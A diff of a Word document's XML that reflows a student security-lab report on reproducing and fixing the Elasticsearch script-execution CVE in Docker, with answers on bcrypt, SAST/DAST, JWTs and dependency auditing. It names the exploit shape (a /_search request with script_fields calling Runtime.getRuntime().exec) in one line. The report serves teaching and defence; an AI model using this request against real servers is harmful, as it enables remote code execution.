+        <w:jc w:val="left"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>code *and* pinned by tests, (b) a CI pipeline that fails on a medium SAST finding</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
+        <w:t xml:space="preserve">The most transferable lesson is from part (c): the flaw was not a missing </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>if</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>or a vulnerable dependency, and (c) a reproducible exploitation-and-fix cycle for</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
+        <w:t xml:space="preserve">. Elasticsearch 1.1.1 had a check — the request had to be well-formed JSON — but it treated </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:i/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>code</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>a real CVE.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">The most transferable lesson is from part (c): the flaw was not a missing </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>if</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>Elasticsearch 1.1.1 had a check — the request had to be well-formed JSON — but it</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>treated *code* as ordinary data, so the check was irrelevant. A capability that</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>lets a client run code is not something a filter can make safe; it has to be</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>removed from the reachable surface, or at minimum switched off by default. The</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>same reasoning explains why the upgrade alone is not the whole answer: 1.4.4</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>fixed this CVE and still fell to a sandbox escape a year later</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>(CVE-2015-1427), while "no client-supplied scripts" would have prevented both.</w:t>
+        <w:t xml:space="preserve"> as ordinary data, so the check was irrelevant. A capability that lets a client run code is not something a filter can make safe; it has to be removed from the reachable surface, or at minimum switched off by default. The same reasoning explains why the upgrade alone is not the whole answer: 1.4.4 fixed this CVE and still fell to a sandbox escape a year later (CVE-2015-1427), while "no client-supplied scripts" would have prevented both.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -5310,9 +4769,17 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
         <w:spacing w:after="40"/>
+        <w:ind w:left="425" w:hanging="425"/>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>1.</w:t>
+        <w:tab/>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
@@ -5326,731 +4793,379 @@
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve"> SHA-256 is designed to be fast, so a GPU</w:t>
+        <w:t xml:space="preserve"> SHA-256 is designed to be fast, so a GPU can try billions of candidates per second. bcrypt is deliberately slow and tunable (cost 12 ≈ 2^12 rounds), and it stores a per-password salt inside the hash, so identical passwords produce different hashes and precomputed rainbow tables do not apply.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
+        <w:spacing w:after="40"/>
+        <w:ind w:left="425" w:hanging="425"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>can try billions of candidates per second. bcrypt is deliberately slow and</w:t>
+        <w:t>2.</w:t>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>SAST vs DAST.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> SAST analyses source code without running it — it sees every branch, including unreachable code, but produces false positives and cannot see configuration or runtime state. DAST attacks a running application from outside — it finds real, reachable issues but only covers what it can reach and gives less precise localisation.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
+        <w:spacing w:after="40"/>
+        <w:ind w:left="425" w:hanging="425"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>tunable (cost 12 ≈ 2^12 rounds), and it stores a per-password salt inside the</w:t>
+        <w:t>3.</w:t>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>JWT mechanism.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> A JWT is </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>base64url(header).base64url(payload).signature</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>. The payload carries claims (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>sub</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>role</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>exp</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>iss</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve">, </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>jti</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>). The server verifies the signature with a shared secret (HS256) or public key (RS256) and checks the time-based and issuer claims. The payload is signed, not encrypted — anyone can read it, so no secrets belong in it.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
+        <w:spacing w:after="40"/>
+        <w:ind w:left="425" w:hanging="425"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>hash, so identical passwords produce different hashes and precomputed</w:t>
+        <w:t>4.</w:t>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>Risk of not auditing dependencies.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Third-party code runs with your privileges. An unpatched library with a known CVE (Log4Shell, the event-stream incident) gives an attacker code execution or data access without ever touching your own source. SCA is the only control that catches this, because SAST looks at </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:i/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>your</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> code.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
+        <w:spacing w:after="40"/>
+        <w:ind w:left="425" w:hanging="425"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>rainbow tables do not apply.</w:t>
+        <w:t>5.</w:t>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>Docker/Vulhub vs installing vulnerable software.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Containers are disposable, isolated and reproducible: no host pollution, no leftover services, a rollback is </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>docker compose down</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>, and the exact vulnerable version is pinned in a file that can be shared with the whole class.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
         <w:spacing w:after="40"/>
+        <w:ind w:left="425" w:hanging="425"/>
       </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>6.</w:t>
+        <w:tab/>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:b/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>SAST vs DAST.</w:t>
+        <w:t>Vulnerability vs exploit.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve"> SAST analyses source code without running it — it sees</w:t>
+        <w:t xml:space="preserve"> A vulnerability is the flaw itself (Elasticsearch compiles and evaluates client-supplied scripts with full Java reflection and no authentication). An exploit is the concrete request that abuses it (</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>POST /_search</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> with </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>script_fields</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> calling </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>Runtime.getRuntime().exec</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>). In this work the vulnerability is the dangerous default in the product; the exploit is the curl request.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
+        <w:spacing w:after="40"/>
+        <w:ind w:left="425" w:hanging="425"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>every branch, including unreachable code, but produces false positives and</w:t>
+        <w:t>7.</w:t>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:b/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t>Why regression testing after a patch.</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
+          <w:sz w:val="22"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> A patch changes behaviour, and a security fix that disables the feature is not a fix. Here, a perfectly "secure" answer would be to block the whole service; the regression check (the same document is still searchable after the fix) proves the legitimate path still works.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
+        <w:spacing w:after="40"/>
+        <w:ind w:left="425" w:hanging="425"/>
       </w:pPr>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>cannot see configuration or runtime state. DAST attacks a running</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>application from outside — it finds real, reachable issues but only covers</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>what it can reach and gives less precise localisation.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-        <w:spacing w:after="40"/>
-      </w:pPr>
+        <w:t>8.</w:t>
+        <w:tab/>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:b/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>JWT mechanism.</w:t>
+        <w:t>Why reproduce CVEs as a specialist.</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t xml:space="preserve"> A JWT is </w:t>
+        <w:t xml:space="preserve"> A pentester needs to know what a working exploit looks like in order to judge whether a target is really affected, and a SOC analyst needs the same knowledge to recognise the traffic in logs. Reproduction turns a CVE description into a concrete signature: a search request carrying </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
           <w:sz w:val="20"/>
         </w:rPr>
-        <w:t>base64url(header).base64url(payload).signature</w:t>
+        <w:t>script_fields</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
           <w:sz w:val="22"/>
         </w:rPr>
-        <w:t>.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>The payload carries claims (</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>sub</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>role</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>exp</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>iss</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">, </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>jti</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>). The server</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>verifies the signature with a shared secret (HS256) or public key (RS256) and</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>checks the time-based and issuer claims. The payload is signed, not</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>encrypted — anyone can read it, so no secrets belong in it.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-        <w:spacing w:after="40"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:b/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>Risk of not auditing dependencies.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Third-party code runs with your</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>privileges. An unpatched library with a known CVE (Log4Shell, the</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>event-stream incident) gives an attacker code execution or data access</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>without ever touching your own source. SCA is the only control that catches</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>this, because SAST looks at *your* code.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-        <w:spacing w:after="40"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:b/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>Docker/Vulhub vs installing vulnerable software.</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> Containers are</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>disposable, isolated and reproducible: no host pollution, no leftover</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t xml:space="preserve">services, a rollback is </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>docker compose down</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>, and the exact vulnerable</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:spacing w:after="120"/>
-        <w:jc w:val="both"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman"/>
-          <w:sz w:val="22"/>
-        </w:rPr>
-        <w:t>version is pinned in a file that can be shared with the whole class.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListNumber"/>
-        <w:spacing w:after="40"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
